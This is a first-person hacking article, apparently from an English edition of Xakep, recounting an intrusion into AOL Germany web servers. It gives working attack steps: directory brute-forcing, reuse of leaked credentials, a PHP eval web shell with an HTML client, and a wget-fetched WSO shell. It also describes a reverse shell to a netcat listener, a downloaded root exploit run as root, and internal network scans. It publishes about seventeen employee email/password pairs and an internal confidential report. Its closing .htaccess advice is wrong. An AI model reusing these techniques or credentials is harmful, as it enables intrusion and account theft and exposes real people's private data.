Welcome Guest | RSS

Official Site Of The Xakep 4T english version

Thursday, 2017-12-14, 1:51 AM
Main » 2011 » April » 29 » Knocked-Out AOL: How The AOL Servers Were Hacked
1:17 PM
Knocked-Out AOL: How The AOL Servers Were Hacked

AOL Corporation has always been a kind of honey pie for all possible kinds of hackers. Millions of AIM, AOL Mail and ICQ registered users, hundreds of offices all around the world, one billion advertising market and other stuff you can check out directly from the aol.com home page, which enters the Top 50 websites attendance list all around the internet.

Looking at all this magnificence you won’t be surprised that one day I’ve forwarded my XSpider 7.7 to one of the AOL networks in the range of 64.12.0.0 - 64.12.255.255. So here's how the things turned out...

Victim detected

Out of a rich variety of corporation IP addresses considering the specified range, the alex-aolde-mtc02.evip.aol.com was the first one to attract my attention. After some detailed inspection it turned out to be a certain website - http://alex.aol.de, having its own windows login and password home page. Then, after giving a first glance, it became clear the website is based on Joomla CMS 1.5.x.

As you know, one of today's best solutions for searching vulnerabilities in Joomla based websites is "Joomla! Security/Vulnerability Scanner" which is included in the OWASP Project created by the guys from YGN Ethical Hacker Group. So, after downloading the scanner, I’ve launched it as follows:

C:/Perl/bin/perl5.12.1.exe C:/joomscan/joomscan.pl -u http://alex.aol.de

A few minutes later I got a following result:

* Deduced version range is : [1.5.12 - 1.5.14]
...
# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? Yes
...
# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

None of the "vulnerabilities" that were found didn’t help me become closer to the cherished goal of hacking the website.

Help from OWASP

Realizing that Joomla just won’t help me to get access to the necessary server I decided to scan all website’s directories and files, which are hidden from prying eyes, by using another OWASP project – DirBooster directories brootforce software.

After launching the program I’ve set the following settings:

Target URL: http://alex.aol.de/;
Work Method: Auto Switch (HEAD and GET);
Number Of Threads: 200;
Select starting options: Standard start point, Brute Force Dirs, Brute Force Files;
File extension: php.

Then I tried to apply the bruteforce software with all standard dictionaries included.

I was the most pleased by the following results: ./info.php (phpinfo), ./pma (phpMyAdmin) and ./dnld directory containing three really nice files (configuration.php, phpMyAdmin-3.3.2-english.tar, wirwarendrin.tar).

80 Mb wirwarendrin.tar archive made me happy as the alex.aol.de homepage has a link to wirwarendrin.de, which is a kind of AOL resource’s mirror.

After downloading the specified file I explored it includes a full backup of our website :).

Save your backups in a savings bank!

While browsing the backup archive I was the most interested in Joomla configuration file named configuration.php. That file contained the following interesting things:

<?php
class JConfig {
...
var $secret = 'NAAgXewXco6BSw2d';
...
var $host = 'localhost';
var $user = 'alex';
var $db = 'test';
...
var $smtpport = '465';
var $smtpuser = 'wirwarendrin';
var $smtppass = 'Briesben';
var $smtphost = 'smtp.aol.com';
...
var $password = 'wjedko,lg';
...
}
?>

The first thing I did was getting into the wirwarendrin@aol.com mailbox, which, as it turned out, was a mailbox for all alex.aol.de users registration data to be sent to. Then, it seemed logical to try the MySQL username and password for phpMyAdmin. Actually, I have done that at once :).

Of course, the password for "alex” user was correct, so I had two choices for shell upload: new Joomla administrator adding or bruteforcing the existing administrator password. I chose the second option.

Quick and easy bruteforce!

My favorite bruteforce software is PasswordsPro which is suitable for different types of hashes, and supports the Joomla password encryption format - Md5 ($ pass. $ Salt).

Thus, after downloading some rather large dictionaries and adding them to PasswordsPro library I started my patient waiting for the brutforcer to find the salty admin hash d86f4c81342b79c4bab8868656cabe46:t65HKT9iuoOUdvfIAD0JP0ynT6EpRHXb.

After several hours of bruteforce processing the utility gave me the "qwertyzuaor” password for the above hash. I’ve successfully logged into alex.aol.de, as well as the alex.aol.de/administrator.

By the way, as it turned out, the alex.aol.de website was created by one of the AOL employees and its purpose was German AOL Corporation branch staff party coordination. There were about 450 former and current employees of AOL registered to get on the inside of the set out. So, I started uploading the shell by modifying the Joomla template :)

AOL Inside

The template to edit was located at the admin area: "Extensions -> Template Manager -> aol-exit -> Edit HTML". The template file itself was here /data/servers/wahl-o-mat_aol_de /pages/alex_aol_de/templates/aol-exit/index.php. I’ve inserted a small Kawai construction at the top of the template file:

<?php
eval(stripslashes($_REQUEST[aaa]));
?>

It remained only to create some HTML-Client for that stuff:

<form action="http://alex.aol.de/templates/aol-exit/index.php" method="POST">
<input type="text" name="aaa"/>
<input type="submit" value="Pwn It!"/>
</form>

The first thing I did was uploading a WSO-shell to server with the wget utility. I placed it directly to the templates directory and named it as 404.php so I was able to comfortably browse all the files and directories (by the way, another admin sin was keeping absolutely all files and directories open for writing).

Getting deeper!

The /data/servers directory made it possible to browse all alex.aol.de neighbor sites: editor.aol.fr, gat.aol.co.uk, sns.nexus.aol.com, wahl-o-mat.aol.de, matrix.aol.de. I didn’t want to penetrate with their structure and meaning, so I simply downloaded all those websites sources to my VDS HDD having all that stuff pre-packed by the following command:

cd /data/servers;tar czvf /tmp/1.tgz ./*

Another goal I set for myself was getting the root access for that server. The good thing was that an old and dull kernel allowed that action:

Linux wahl-o-mat.aol.de 2.6.9-55.ELsmp #1 SMP Fri Apr 20 17:03:35 EDT 2007 i686

I needed some interactive shell to start. I got it by banal Perl Back-connect to the 31337 port of my VDS in WSO (Network section) which became a NetCat byword:

c:/netcat/nc.exe -l -p 31337

After obtaining the required things I started searching the http://www.exploit-db.com for the corresponding root exploit. The one I found was, again, kind of German made "wunderbar emporium". Then, after giving a straightforward sequence of commands I got the coveted "uid = 0 (root) gid = 0 (root) groups = 11560 (httpd)":

wget http://www.grsecurity.net/~spender/wunderbar_emporium.tgz;tar xzfv wunderbar_emporium.tgz;chmod 0777 ./*;./wunderbar_emporium.sh

Interesting

After obtaining the root access rights I wanted to scan the internal network for some reason. I ran the ifconfig command and found out that server has the 10.62.134.80 IP address within our network. So the next thing I did was downloading and installing the nmap with rpm:

rpm -vhU http://nmap.org/dist/nmap-5.21-1.i386.rpm

and running it as follows::

nmap -v -n -sS 10.62.134.0/24

Now I'm not going to talk about all further actions I made to German AOL network, but I will show a couple of the most interesting scanner reports:

Nmap scan report for 10.62.134.89
Host is up (0.00013s latency).
Not shown: 986 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
1024/tcp open kdm
1041/tcp open unknown
1051/tcp open optima-vnet
1311/tcp open rxmon
1801/tcp open unknown
2099/tcp open unknown
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open unknown
3389/tcp open ms-term-serv
MAC Address: 00:18:8B:74:52:6E (Dell)
...

Nmap scan report for 10.62.134.96
Host is up (0.00013s latency).
Not shown: 971 closed ports
PORT STATE SERVICE
22/tcp open ssh
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1024/tcp open kdm
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1078/tcp open unknown
1112/tcp open msql
1311/tcp open rxmon
1801/tcp open unknown
2099/tcp open unknown
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open unknown
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-term-serv
9998/tcp open unknown
13722/tcp open netbackup
13782/tcp open netbackup
13783/tcp open netbackup
49152/tcp open unknown
49153/tcp open unknown
MAC Address: 00:13:72:5A:3E:78 (Dell)

As you see, AOL is fond of Microsoft products :).

AOL Confidential

That’s it for today with a troubled AOL internal network and I suggest you to continue with usernames and password hashes of corporation employees I’ve pulled out from the Joomla CMS database. As I wrote above, PasswordsPro software had really helped me to decrypt the alex.aol.de administrator password hash. Nevertheless, I decided not to limit myself with the admin password alone, so I started bruteforcing the remaining 450 accounts. Actually, I’ve successfully bruteforced 197 of them. Then I started to quietly check those passwords to match the AOL staff’s email passwords. Here are some interesting live accounts:

guenterstaar guenterstaar@aol.com:keiness
thomaskuck thomaskuck@aol.com:sascha
mdfreedom99 marcdrewello@aol.com:Magic23
ClaudiaLangwald ClaudiaLangwald@aol.com:Silvera
bettyvonloesch bettyvonloesch@aol.com:hanne
Pierre PierreBeneHH@aol.com:wombast
Tenge Tenge@aol.com:derwis
JennySefkow JennySefkow@aol.com:varita
NinaRixenHH@aol.com NinaRixenHH@aol.com:brauere
Jennifer2706 jennifermatheja@aol.com:elite15
A.V.aus H. voigthh@googlemail.com:Delphines
fkorupp frederickorupp@googlemail.com:wasistdas
KrassowskiSabine@aol.de KrassowskiSabine@aol.de:Sommer44
neddie annettharksenhh@aol.de:hochzeis
Trixi seebertrixi@aol.de:sommer07
tringasvassiliki tringasvassiliki@aol.de:perikle
AgnesAB
agnesboltzenhh@aol.de:April2008

As you see, passwords simplicity can easily blow one’s mind :).

I’ve found a lot of really entertaining documents in those mailboxes, such as internal AOL receipts, employees’ summary, photographs of offices, different addresses and phone numbers, some ebay and paypal passwords (!) and some statistics, etc.

Here is just a part of one of the internal document marked as "Company Confidential".

AOL Germany SNAPSHOT SUMMARY as of COB
Date : [2006-02-11]
Business :
AOL
GERMANY (AOL)
FOR [2006-02-11]
-Ending Members 2,687,173
-Registrations 1,824
-Reactivations 146
-Overhead Conversions 1
-Cancellations 1,472
-Terminations 549
-Net Change -50
-Customer Hours 7,301,418
-Total Hours 7,322,081

Apparently, these statistics contain full information on the internal user turnover of German AOL corporation branch under 11/02/2006 :).

Last thing

You’ve become a spectator of another large company website hack story evolve process. It occurred due to banal carelessness and inattention of website administrator. I can mention a few fundamental factors: public accessible storage backup, external user’s accessible phpMyAdmin, the old kernel, files and directories recording openness and some really predictable passwords. I hope you will never repeat those really stupid mistakes the AOL workers did after reading this opus :).

INFO:

In order to protect your website internal directories from prying eyes, I advise you to put the .htaccess file containing a single line in every sensitive directory:

Options +Indexes

In order to protect all directory files from any outside access add several more thing to .htaccess file:

Order Deny, Allow
Deny from all

DANGER

The above article is the product of the author’s diseased imagination. Any overlap with existing site is accident. Neither the editors nor the author shall not be liable for any possible damages caused by the materials of this article.

Views: 16552 | Added by: XakepNews | Rating: 5.0/1
Total comments: 1
1  
Соберем для Вас по сети интернет
базу данных потенциальных клиентов
для Вашего Бизнеса
(название, телефон, факс, e-mail, имена итд)
Много! Быстро! Недорого!
Чтобы узнать более подробно свяжитесь с нами
по телефону +79133913837
Email: basedannix@mixmail.com
ICQ: 6288862
Skype: s....8

Name *:
Email *:
Code *: